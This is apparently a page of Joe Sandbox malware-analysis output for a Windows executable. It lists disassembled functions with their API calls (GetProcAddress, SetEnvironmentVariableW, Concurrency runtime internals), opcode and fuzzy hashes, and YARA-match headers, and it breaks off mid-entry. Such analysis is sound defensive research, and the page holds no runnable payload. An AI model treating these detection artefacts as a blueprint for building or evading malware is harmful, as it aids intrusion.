                    • API ID: Mtx_destroy_in_situ$Cnd_destroy_in_situ
                    • String ID: pB@
                    • API String ID: 3308344742-522444117
                    • Opcode ID: f17a27479b94ee524bee0745035b5a9fa0b6b924b3b87c51be5c751a629281f5
                    • Instruction ID: 9fa57e067fa2e57eae0d05727bcb9931675f6d872009e7436c3174976e3d59b0
                    • Opcode Fuzzy Hash: f17a27479b94ee524bee0745035b5a9fa0b6b924b3b87c51be5c751a629281f5
                    • Instruction Fuzzy Hash: 1F31E571600B009FD7248F29C889B66BBE9EF44725F04466EE95ACB391D73CED00CB94
                    Function 0042AF75 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                    Download Yara Rule
                    APIs
                    • List.LIBCONCRT ref: 0042AFFA
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042B01F
                    • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0042B05E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                    • String ID: pExecutionResource
                    • API String ID: 1772865662-359481074
                    • Opcode ID: 97894c26e78649899b86c153b2f2f2c3430a5959f8272080c60c93d73f9dd151
                    • Instruction ID: b773aba9d63d3202b0a560684f2aba75f81d395c910e5e66aad4bd489bcccfa2
                    • Opcode Fuzzy Hash: 97894c26e78649899b86c153b2f2f2c3430a5959f8272080c60c93d73f9dd151
                    • Instruction Fuzzy Hash: 5F21B9B5B402159BCB08EF65C881BED77A1BF48304F50402FF90567392DBB8AE45CB99
                    Function 04502B54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 04502BC7
                    • _free.LIBCMT ref: 04502C1D
                      • Part of subcall function 045029F9: _free.LIBCMT ref: 04502A51
                      • Part of subcall function 045029F9: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 04502A63
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$InformationTimeZone
                    • String ID: XgE
                    • API String ID: 597776487-2984570469
                    • Opcode ID: 6441d443f5a211a1e84640d481851bc996ae4ec302849a78cb35b14bec5ad1ce
                    • Instruction ID: c878fe14d37921fc769b39664816bdb01a63444dd9908dfb49818149e88af6e4
                    • Opcode Fuzzy Hash: 6441d443f5a211a1e84640d481851bc996ae4ec302849a78cb35b14bec5ad1ce
                    • Instruction Fuzzy Hash: F7216B3A90011577DB30AB259C49EEA7768FB81324F1042E6F994A30D0FF707D81A691
                    Function 00444FE7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                    Download Yara Rule
                    APIs
                    • SetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00445052
                    • _free.LIBCMT ref: 00445061
                    • _free.LIBCMT ref: 00445070
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$EnvironmentVariable
                    • String ID: +C
                    • API String ID: 1464849758-2392048020
                    • Opcode ID: f677b73a37d78ac646d0ce1cbfd6812df92f093aa3150c3488a8ffb32704bfce
                    • Instruction ID: baffdb16212c9a535461b980e853fd56a9b8a88738fd2a4de881e2530209dff9
                    • Opcode Fuzzy Hash: f677b73a37d78ac646d0ce1cbfd6812df92f093aa3150c3488a8ffb32704bfce
                    • Instruction Fuzzy Hash: 411130B1C01219AFDF11AFAA98816DEFFB8BF08314F54406FE414B2212D6384945CBA8
                    Function 00424A4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerBase::Cleanup.LIBCONCRT ref: 00424A7E
                      • Part of subcall function 0042533F: Concurrency::details::SchedulingNode::~SchedulingNode.LIBCONCRT ref: 00425359
                      • Part of subcall function 0042533F: Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 004277D7
                      • Part of subcall function 0042533F: Concurrency::details::_UnregisterConcRTEventTracing.LIBCONCRT ref: 004277E9
                      • Part of subcall function 0042533F: InterlockedPopEntrySList.KERNEL32(00465B38,00000004,00448B40,000000FF), ref: 004277FF
                      • Part of subcall function 0041F517: DeleteCriticalSection.KERNEL32(?,0042BCC1,1F0F83C3,00000000,?,?,00000000,0044B50B,000000FF,?,0042069C), ref: 0041F518
                    • ~ListArray.LIBCONCRT ref: 00424AC0
                      • Part of subcall function 0042491B: InterlockedFlushSList.KERNEL32(?,?,?,00424AC5,1F0F83C3,?,?,?,00448B40,000000FF), ref: 00424920
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 00424929
                      • Part of subcall function 0042491B: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424AC5,1F0F83C3,?,?,?,00448B40,000000FF), ref: 00424932
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 0042493B
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 00424945
                    • ~ListArray.LIBCONCRT ref: 00424AC8
                      • Part of subcall function 00424995: InterlockedFlushSList.KERNEL32(?,?,?,00424ACD,1F0F83C3,?,?,?,00448B40,000000FF), ref: 0042499A
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249A3
                      • Part of subcall function 00424995: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424ACD,1F0F83C3,?,?,?,00448B40,000000FF), ref: 004249AC
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249B5
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249BF
                      • Part of subcall function 00424995: _InternalDeleteHelper.LIBCONCRT ref: 004249D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$Array$Interlocked$Flush$Concurrency::details::Concurrency::details::_DeleteScheduling$AcquireBase::CleanupConcCriticalEntryEventHelperInternalLock::_NodeNode::~ReentrantSchedulerSectionTracingUnregister
                    • String ID: LB
                    • API String ID: 3638618822-539997225
                    • Opcode ID: 2c5bffe565fc1a589e524a320b064d675ffc6f65a44ddfca8fe6eaf759df9dd3
                    • Instruction ID: bf305711c351f3dadb84e76d88fdd0194d9a71be08566a7c9c65e0dd41fe3e85
                    • Opcode Fuzzy Hash: 2c5bffe565fc1a589e524a320b064d675ffc6f65a44ddfca8fe6eaf759df9dd3
                    • Instruction Fuzzy Hash: 98116071600911AFC708EB26EC02AD9F360FF54718F80412FE516539A2EF787955CA8C
                    Function 00424A52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerBase::Cleanup.LIBCONCRT ref: 00424A7E
                      • Part of subcall function 0042533F: Concurrency::details::SchedulingNode::~SchedulingNode.LIBCONCRT ref: 00425359
                      • Part of subcall function 0042533F: Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 004277D7
                      • Part of subcall function 0042533F: Concurrency::details::_UnregisterConcRTEventTracing.LIBCONCRT ref: 004277E9
                      • Part of subcall function 0042533F: InterlockedPopEntrySList.KERNEL32(00465B38,00000004,00448B40,000000FF), ref: 004277FF
                      • Part of subcall function 0041F517: DeleteCriticalSection.KERNEL32(?,0042BCC1,1F0F83C3,00000000,?,?,00000000,0044B50B,000000FF,?,0042069C), ref: 0041F518
                    • ~ListArray.LIBCONCRT ref: 00424AC0
                      • Part of subcall function 0042491B: InterlockedFlushSList.KERNEL32(?,?,?,00424AC5,1F0F83C3,?,?,?,00448B40,000000FF), ref: 00424920
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 00424929
                      • Part of subcall function 0042491B: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424AC5,1F0F83C3,?,?,?,00448B40,000000FF), ref: 00424932
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 0042493B
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 00424945
                    • ~ListArray.LIBCONCRT ref: 00424AC8
                      • Part of subcall function 00424995: InterlockedFlushSList.KERNEL32(?,?,?,00424ACD,1F0F83C3,?,?,?,00448B40,000000FF), ref: 0042499A
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249A3
                      • Part of subcall function 00424995: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424ACD,1F0F83C3,?,?,?,00448B40,000000FF), ref: 004249AC
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249B5
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249BF
                      • Part of subcall function 00424995: _InternalDeleteHelper.LIBCONCRT ref: 004249D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$Array$Interlocked$Flush$Concurrency::details::Concurrency::details::_DeleteScheduling$AcquireBase::CleanupConcCriticalEntryEventHelperInternalLock::_NodeNode::~ReentrantSchedulerSectionTracingUnregister
                    • String ID: LB
                    • API String ID: 3638618822-539997225
                    • Opcode ID: ae0471225621b25c0567817870b227a74b1c6a1860987c812b59f16e11b982c9
                    • Instruction ID: 20409b734b108c2c2fdfc696bb707ba8dd51a7162063a93118c7aaaaa135de39
                    • Opcode Fuzzy Hash: ae0471225621b25c0567817870b227a74b1c6a1860987c812b59f16e11b982c9
                    • Instruction Fuzzy Hash: B0118271600911AFC708EB26EC02AD9F360FF54718F80412FE516439A2EF787955CA8C
                    Function 044E0FD3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __EH_prolog3.LIBCMT ref: 044E1041
                    • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 044E104E
                    • Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 044E10A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$AcquireConcurrency::details::Concurrency::details::_H_prolog3Lock::_ManagerManager::Reentrant
                    • String ID: @[F
                    • API String ID: 220083066-1227568360
                    • Opcode ID: 2f05aafc6545dd2f02b0a4a7403fc2fb1387cc79212c786ca64f800411f26202
                    • Instruction ID: 8efa52dd9b8878f118dd8f6e6308ad07cfe5bb6903abc6dd303b12787e25b5e0
                    • Opcode Fuzzy Hash: 2f05aafc6545dd2f02b0a4a7403fc2fb1387cc79212c786ca64f800411f26202
                    • Instruction Fuzzy Hash: 7501B5B0E047619AEF20AFFB546437E67E0AF44705F50006FD505EB782EFB469014396
                    Function 0042A1FE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0042A212
                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0042A236
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042A249
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                    • String ID: pScheduler
                    • API String ID: 246774199-923244539
                    • Opcode ID: db1abe11a5b6d728c40cbcf3526037f91d143974519c1bd9b24ca0c0f7484b45
                    • Instruction ID: 1c324d8570b02ec0d7fbee642b19b31dd6212496db4bd76d71850650a4a55e5c
                    • Opcode Fuzzy Hash: db1abe11a5b6d728c40cbcf3526037f91d143974519c1bd9b24ca0c0f7484b45
                    • Instruction Fuzzy Hash: 23F02B35B00224E7C324FA41F84295EB3759F907157A0445FED0127682DF7D9A09C6AA
                    Function 044E0191 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29registryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RegisterWaitForSingleObject.KERNEL32(?,6C,?,044F0D9D,000000FF,0000000C), ref: 044E01A8
                    • GetLastError.KERNEL32(?,044F0D9D,?,00430A36,?,?,?,?,?,?,044E6025,?), ref: 044E01B7
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 044E01CD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastObjectRegisterSingleWait
                    • String ID: 6C
                    • API String ID: 2296417588-3399334032
                    • Opcode ID: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
                    • Instruction ID: bb85c0ee88b5ba719ea89aeb4053f16b488cb56a2c407dff470f740375ba511d
                    • Opcode Fuzzy Hash: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
                    • Instruction Fuzzy Hash: 06F0A03450020EFBDF00EFA2DD44EAF777C6F00706F200516B921E61D2DA35E6049B64
                    Function 0041FF2A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29registryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RegisterWaitForSingleObject.KERNEL32(?,6C,?,00430B36,000000FF,0000000C), ref: 0041FF41
                    • GetLastError.KERNEL32(?,00430B36,?,00430A36,?,?,?,?,?,?,00425DBE,?), ref: 0041FF50
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FF66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastObjectRegisterSingleWait
                    • String ID: 6C
                    • API String ID: 2296417588-3399334032
                    • Opcode ID: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
                    • Instruction ID: b1894cb517c06a3f85e37dbbb0dbc8aa4abe9868d7e3a5819c2c87bac6c50229
                    • Opcode Fuzzy Hash: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
                    • Instruction Fuzzy Hash: 90F0A03560020ABBCF00EFA1DD05EEF376C6B04715F200526B625E50E2DA38EA44A768
                    Function 00402AF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00402B23
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#@$P#@$This function cannot be called on a default constructed task
                    • API String ID: 2659868963-4211761357
                    • Opcode ID: e9cdc6489369cfd9be3314ceed02266653c38b42fbd19f51722a6ce7c4a67d25
                    • Instruction ID: 61496bd6a01842805568ee1c9490c26cdbd20980f2f353701ae25422a6d128cf
                    • Opcode Fuzzy Hash: e9cdc6489369cfd9be3314ceed02266653c38b42fbd19f51722a6ce7c4a67d25
                    • Instruction Fuzzy Hash: 48F0A770D1020CABC710DF68984159EFBF89F15305F1082AFEC4067301EBB51A58CB99
                    Function 044DD510 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    • RtlLeaveCriticalSection.NTDLL(00465720), ref: 044DD53D
                    • WaitForSingleObjectEx.KERNEL32(00468650,00000000,?,044DD4AD,00000064,?,0045007C,?,044C78C4,00468650), ref: 044DD54E
                    • RtlEnterCriticalSection.NTDLL(00465720), ref: 044DD555
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeaveObjectSingleWait
                    • String ID: WF
                    • API String ID: 501323975-2907287748
                    • Opcode ID: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
                    • Instruction ID: fcf1b9fe2272400b798edc520838b4a6da70402d70b73bc2f592014bae19fcd8
                    • Opcode Fuzzy Hash: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
                    • Instruction Fuzzy Hash: DFE01235941B24F7CF122B54FC58B9E3F28EB09753F044072F90996161D765A9019BDE
                    Function 044C8007 Relevance: 6.4, APIs: 4, Instructions: 388libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,00462014), ref: 044C8081
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 044C80E2
                    • GetProcAddress.KERNEL32(00000000), ref: 044C80E9
                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 044C81AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleInfoModuleProcSystemVersion
                    • String ID:
                    • API String ID: 1456109104-0
                    • Opcode ID: 0750ffa8f9e8c1b5d2fc2a487a38cc494255bfc163da6e69255bac15691254b7
                    • Instruction ID: d8550d9b075ddc25e5ef17dd14d4ac50a6dd2cbe3d13ae945c196f7bfabc77ca
                    • Opcode Fuzzy Hash: 0750ffa8f9e8c1b5d2fc2a487a38cc494255bfc163da6e69255bac15691254b7
                    • Instruction Fuzzy Hash: 72D13774F00254ABEF14BF29CD0A7AD7B61AB41325F58029ED805673C2EB756E808BC3
                    Function 044FCDF7 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: 3516cea2d4fcd5d04c7a9842940e5203375c297d26cbd6a2fe6523b0db259a72
                    • Instruction ID: fa31b20e564b8db1ee3706b80767e1f2185a165866df2a486a219cb87919d6e0
                    • Opcode Fuzzy Hash: 3516cea2d4fcd5d04c7a9842940e5203375c297d26cbd6a2fe6523b0db259a72
                    • Instruction Fuzzy Hash: 79B10A71D0424A9FEF25CF28CC80BAEBBE5FF45344F14816BDA569B381D635A942CB60
                    Function 0043CB90 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: fe443eaaead45a2fe6d92bfd8af524bc1db88fc80b8968630d4c4f202f9b58ea
                    • Instruction ID: 7e71781bbfdb81641079919ac07b49ba12931590954ee84f1c7785d69e78186a
                    • Opcode Fuzzy Hash: fe443eaaead45a2fe6d92bfd8af524bc1db88fc80b8968630d4c4f202f9b58ea
                    • Instruction Fuzzy Hash: 0FB124329002859FDB15CF28C8C17AEBBE5EF59350F25A16BE845BB341D63C9D02CB69
                    Function 044F53C6 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: 4b49c434dd43a2b3548b03ffee8323f4b2d9f67f8806a1e4dfd4cd2c0b5c10a9
                    • Instruction ID: cbdb336828cfa61d67c4c98c0acfd5db2bdf345cf414e80455fa941e08ac4891
                    • Opcode Fuzzy Hash: 4b49c434dd43a2b3548b03ffee8323f4b2d9f67f8806a1e4dfd4cd2c0b5c10a9
                    • Instruction Fuzzy Hash: 5D51AE72600216BFEF299F15DC51BAA77A4FF44706F14412FEA0287692E731F891CB50
                    Function 0043515F Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: df63aa666a27828fc5742dfd26fa336a06fdcec75156d215741d98fe2ea97dbe
                    • Instruction ID: b9fc1319993f16ce4fdb72853175d02b605fe766e2192af1e1eb381543aa3c59
                    • Opcode Fuzzy Hash: df63aa666a27828fc5742dfd26fa336a06fdcec75156d215741d98fe2ea97dbe
                    • Instruction Fuzzy Hash: 2851E072601A06AFDB288F51D841BABB7A4EF48310F14156FEC0147391E739EC51CF98
                    Function 044C85B7 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,?,00462014), ref: 044C8630
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 044C8697
                    • GetProcAddress.KERNEL32(00000000), ref: 044C869E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProcVersion
                    • String ID:
                    • API String ID: 3310240892-0
                    • Opcode ID: 81ce20e25303b4957cebf9de81f1feb3c29f087e0053562b26b24a8c8512b9d1
                    • Instruction ID: 079d211b12d69135ae486ff5704152ac2c845dbb21dc8796bedead6f701fd3bc
                    • Opcode Fuzzy Hash: 81ce20e25303b4957cebf9de81f1feb3c29f087e0053562b26b24a8c8512b9d1
                    • Instruction Fuzzy Hash: 29515B74E012089BEF24EF25CD487DDB774EB45311F5446AEE804A73C1EB35AE808B95
                    Function 00408350 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,?,1F0F83C3), ref: 004083C9
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408430
                    • GetProcAddress.KERNEL32(00000000), ref: 00408437
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProcVersion
                    • String ID:
                    • API String ID: 3310240892-0
                    • Opcode ID: e5634ea80967d0c977d17dcc0ac20768d6f5dcf74e96f42855ee01175a53a337
                    • Instruction ID: 2669896dabc0e4ffefeed8579a88ac15b202beb4dd7596f0f9752e6226651e62
                    • Opcode Fuzzy Hash: e5634ea80967d0c977d17dcc0ac20768d6f5dcf74e96f42855ee01175a53a337
                    • Instruction Fuzzy Hash: C0510870900208ABDB14EF64DE497DEBB74EB45314F5042BEE855A72C2EF399AC08B59
                    Function 044F4F8C Relevance: 6.1, APIs: 4, Instructions: 141COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: EqualOffsetTypeids
                    • String ID:
                    • API String ID: 1707706676-0
                    • Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction ID: 436f636bcc004c2f1e241847a141636d76b833363a3770d2cee7e3871b421f6e
                    • Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction Fuzzy Hash: FA518C35A04209AFDF20CF69C880AAEBBF4EF05314F14449ADE51A7352D732BA45CB91
                    Function 00434D25 Relevance: 6.1, APIs: 4, Instructions: 141COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: EqualOffsetTypeids
                    • String ID:
                    • API String ID: 1707706676-0
                    • Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction ID: 79a7c196a4a87a90b7f5eed02673632fb3c179273ff44878c0118b676a9e0162
                    • Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction Fuzzy Hash: 725188359042099FDF10CFA8C4826EFBBF5FF99324F24549AE850A7351D33AA945CB94
                    Function 044C30E7 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                    • String ID:
                    • API String ID: 3264154886-0
                    • Opcode ID: 5bbd86acbd72ef0dd262a715f67dea3354959ec921dd68e941bbba4b1dd8ad38
                    • Instruction ID: ae9bfec8e5d58dd46b6de234b0327c5bf184f47e6e5dfa4b06022e8470957187
